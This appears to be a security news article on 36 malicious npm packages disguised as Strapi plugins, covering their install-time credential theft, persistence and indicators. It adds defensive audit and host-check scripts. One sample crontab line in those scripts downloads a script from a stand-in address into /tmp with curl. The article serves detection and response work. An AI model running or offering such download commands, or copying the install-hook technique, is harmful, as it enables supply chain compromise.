
36 Malicious npm Strapi Packages Used in Targeted Supply Chain Attack 

A sophisticated software supply chain attack has been discovered targeting developers using Strapi. Attackers published 36 malicious packages to the npm registry disguised as legitimate Strapi plugins.

These packages executed automatically during installation, exploiting Redis for remote code execution, stealing credentials, and deploying persistent command-and-control malware.

The campaign appears highly targeted, focusing on a cryptocurrency payment platform and attempting to extract sensitive financial infrastructure data.


How the Malicious npm Packages Worked 

The threat actor created fake packages mimicking real Strapi plugins. Once a developer ran:

npm install

a malicious postinstall script executed automatically, requiring no further action.

Key characteristics:

  • Identical file structure across packages
  • Fake version number 3.6.8
  • Plugin-style naming to appear legitimate
  • Automatic execution during installation

Examples of malicious package names included:

  • strapi-plugin-cron
  • strapi-plugin-events
  • strapi-plugin-seed
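The following Python script is added here as a worked example of the audit this section implies; it is not code from the article or from the Strapi or npm projects. It walks a node_modules tree, parses each package.json, and flags three things: the package names the article lists, Strapi plugins at the reported version 3.6.8, and any package that declares a preinstall, install or postinstall lifecycle script, which is the mechanism that let the malicious code run with no further action. The sample tree it builds is constructed for the demo; a name or version match is a lead to verify, not proof that the installed copy is malicious.

```python
"""Audit a node_modules tree for packages matching the traits described above.

Added example, not code from the article or from the Strapi/npm projects.
Flags: the example package names the article lists, Strapi plugins at the
reported version 3.6.8, and any package that declares an npm lifecycle script
(preinstall/install/postinstall), the hook the campaign used to run on install.
"""
import json
import os
import tempfile

# Package names the article gives as examples of the malicious packages.
KNOWN_MALICIOUS = {"strapi-plugin-cron", "strapi-plugin-events", "strapi-plugin-seed"}
# Version string the article reports as shared across the fake packages.
SUSPECT_VERSION = "3.6.8"
# npm runs these automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def audit_package(manifest: dict) -> list[str]:
    """Return findings for one parsed package.json (empty list = nothing flagged)."""
    findings = []
    name = manifest.get("name", "")
    version = manifest.get("version", "")
    scripts = manifest.get("scripts") or {}
    if name in KNOWN_MALICIOUS:
        findings.append(f"{name}: name matches a package reported in the campaign")
    if name.startswith("strapi-plugin-") and version == SUSPECT_VERSION:
        findings.append(f"{name}: Strapi plugin at the suspect version {SUSPECT_VERSION}")
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"{name}@{version}: declares a {hook} script: {scripts[hook]!r}")
    return findings


def audit_node_modules(root: str) -> dict[str, list[str]]:
    """Walk node_modules (nested and scoped packages included) and audit every
    package.json that names a package. Keys are paths relative to root."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or not JSON: not an installed package manifest
        if not isinstance(manifest, dict) or "name" not in manifest:
            continue
        findings = audit_package(manifest)
        if findings:
            report[os.path.relpath(dirpath, root)] = findings
    return report


def build_sample_tree() -> str:
    """Constructed demo input: a scratch node_modules with one benign package
    and one that carries all three traits. Returns the scratch root."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    samples = {
        "lodash": {"name": "lodash", "version": "4.17.21"},
        "strapi-plugin-cron": {
            "name": "strapi-plugin-cron",
            "version": "3.6.8",
            # Constructed placeholder command, not the real payload.
            "scripts": {"postinstall": "node ./setup.js"},
        },
    }
    for folder, manifest in samples.items():
        pkg_dir = os.path.join(root, folder)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for pkg, findings in audit_node_modules(build_sample_tree()).items():
        print(pkg)
        for finding in findings:
            print("  -", finding)
```

Run it against a real project by calling audit_node_modules with the path to that project's node_modules. Setting ignore-scripts=true in .npmrc (or passing --ignore-scripts to npm install) stops lifecycle scripts from running at install time, which removes the initial execution step this campaign relied on; packages that genuinely need a build step then have to be handled explicitly.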

Multiple Fake Publisher Accounts 

The malicious packages were distributed through four npm accounts believed to be controlled by one attacker:

  • umarbek1233
  • kekylf12
  • tikeqemif26
  • umar_bektembiev1

This tactic helped evade detection and increase credibility.


Redis RCE and Credential Harvesting 

Early payloads focused on:

  • Redis remote code execution
  • Docker container escape
  • Filesystem secret scanning
  • Environment variable harvesting

Later variants expanded capabilities to:

  • PostgreSQL database access
  • Kubernetes token theft
  • Private key exfiltration
  • API credential harvesting

All stolen data was transmitted over plaintext HTTP to attacker-controlled infrastructure.


Targeted Cryptocurrency Platform 

Researchers discovered references to a crypto payment gateway called Guardarian embedded across payloads.

The malicious code searched for:

  • guardarian
  • guardarian_payments
  • exchange
  • custody

This confirms the attack was not opportunistic but specifically designed for financial theft.


Persistent Command-and-Control Implant

Later payloads deployed a hidden backdoor:

  • File created: /tmp/.node_gc.js
  • Background execution via detached process
  • Cron job restarting every minute
  • Persistent remote access

This transformed a simple package installation into a long-term compromise.


Fileless Malware Variant

The most advanced payload removed disk artifacts entirely:

  • Inline execution using node -e
  • No filesystem traces
  • Memory-only execution
  • Harder detection by security tools

This technique significantly increases stealth.


Infrastructure Reconnaissance

One payload only activated when the hostname matched:

prod-strapi

This indicates the attacker already knew the production environment's hostname, suggesting prior reconnaissance.

The malware also targeted:

  • Jenkins pipeline paths
  • Kubernetes service tokens
  • Docker secrets
  • Environment configuration files

Indicators of Compromise

Security teams should check for:

  • Unknown Strapi plugin installations
  • /tmp/.node_gc.js file
  • /tmp/vps_shell.sh scripts
  • Suspicious cron jobs
  • Outbound connections to the attacker's infrastructure
  • Unexpected Node background processes

Immediate Mitigation Steps 

Organizations using Strapi should:

1. Audit Installed npm Packages

Remove suspicious Strapi plugins immediately.

2. Rotate All Credentials

Reset:

  • Database passwords
  • API keys
  • JWT secrets
  • Private keys

3. Remove Persistent Backdoors

Delete:

  • /tmp/.node_gc.js
  • /tmp/vps_shell.sh
  • Unknown upload directory files

4. Check Cron Jobs

Remove entries referencing:

  • node_gc
  • curl
  • unknown scripts

5. Revoke Kubernetes Tokens

Invalidate exposed service account tokens immediately.
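As a worked example of the indicator checks and clean-up steps in the two sections above, the Python script below is added here; it is not code from the article. It checks for the two file artifacts the article names, flags crontab lines that reference node_gc or curl or that run every minute, and picks out of ps output the node processes that execute inline code (node -e, the fileless variant) or a script under /tmp. The crontab text, the ps listing and the 203.0.113.5 address in them are constructed for the demo; the article does not publish the attacker's address.

```python
"""Host checks for the persistence indicators listed above.

Added example, not code from the article. The artifact paths and cron keywords
come from the article; the sample crontab, ps listing and the 203.0.113.5
address are constructed for the demo (the article does not publish the
attacker's address).
"""
import os
import re
import tempfile

# Files the article names as dropped by the implant.
ARTIFACT_PATHS = ["/tmp/.node_gc.js", "/tmp/vps_shell.sh"]
# Strings the article tells defenders to look for in cron entries.
CRON_KEYWORDS = ("node_gc", "curl")

# Constructed sample crontab: one legitimate job, two that should be flagged.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * node /tmp/.node_gc.js >/dev/null 2>&1
*/15 * * * * curl -s http://203.0.113.5/update.sh -o /tmp/vps_shell.sh
"""

# Constructed sample of `ps -eo pid,ppid,args`: the Strapi server is benign,
# the other two node processes match the article's indicators.
SAMPLE_PS = """\
  PID  PPID ARGS
    1     0 /sbin/init
 2101     1 node /srv/strapi/server.js
 2188     1 node /tmp/.node_gc.js
 2190     1 node -e "setInterval(()=>{},60000)"
"""


def present_artifacts(paths=ARTIFACT_PATHS) -> list[str]:
    """Return the artifact paths that exist on this host."""
    return [p for p in paths if os.path.exists(p)]


def suspicious_cron_entries(crontab_text: str) -> list[str]:
    """Return crontab lines to review: any line mentioning a keyword, plus any
    job scheduled every minute (the article reports a job restarting the
    implant each minute). Comments and blank lines are skipped."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        fields = entry.split()
        every_minute = len(fields) >= 6 and fields[:5] == ["*"] * 5
        has_keyword = any(k in entry for k in CRON_KEYWORDS)
        if has_keyword or every_minute:
            hits.append(entry)
    return hits


def inline_or_tmp_node_processes(ps_text: str) -> list[str]:
    """From `ps -eo pid,ppid,args` output, return node processes that execute
    inline code (`node -e`) or a script under /tmp."""
    flagged = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        args = parts[2]
        is_node = re.match(r"^(\S*/)?node\b", args) is not None
        if is_node and (" -e " in args or "/tmp/" in args):
            flagged.append(line.strip())
    return flagged


def demo_artifact_check() -> list[str]:
    """Constructed demo: plant one of the artifact names in a scratch directory
    and check for both there, to show what a positive result looks like."""
    scratch = tempfile.mkdtemp(prefix="ioc_demo_")
    planted = os.path.join(scratch, ".node_gc.js")
    open(planted, "w", encoding="utf-8").close()
    return present_artifacts([planted, os.path.join(scratch, "vps_shell.sh")])


if __name__ == "__main__":
    print("artifacts on this host:", present_artifacts())
    print("artifacts in demo dir:", demo_artifact_check())
    print("cron entries to review:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("node processes to review:", inline_or_tmp_node_processes(SAMPLE_PS))
```

On a real host, feed suspicious_cron_entries the output of crontab -l for each user plus the contents of the files under /etc/cron.d, and feed inline_or_tmp_node_processes the output of ps -eo pid,ppid,args. A hit is the starting point for the removal steps above; killing the process without also removing the cron entry lets the every-minute job bring it straight back.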


Potential Impact

Successful compromise could expose:

  • Cryptocurrency hot wallet credentials
  • Transaction databases
  • Payment processing systems
  • Infrastructure secrets
  • CI/CD pipelines

This could lead to financial theft and full infrastructure takeover.


Key Takeaways 💡

  • 36 malicious npm packages targeted Strapi developers
  • Automatic execution via postinstall script
  • Redis RCE and credential theft capabilities
  • Persistent command-and-control backdoor
  • Fileless malware variant deployed
  • Cryptocurrency platform specifically targeted
  • Immediate credential rotation required

Conclusion

This campaign highlights the growing risk of supply chain attacks targeting developers through trusted package ecosystems. Even widely used platforms like npm can be abused to distribute highly targeted malware.

Organizations using Strapi should immediately audit dependencies, rotate credentials, and monitor for persistence mechanisms to prevent long-term compromise.
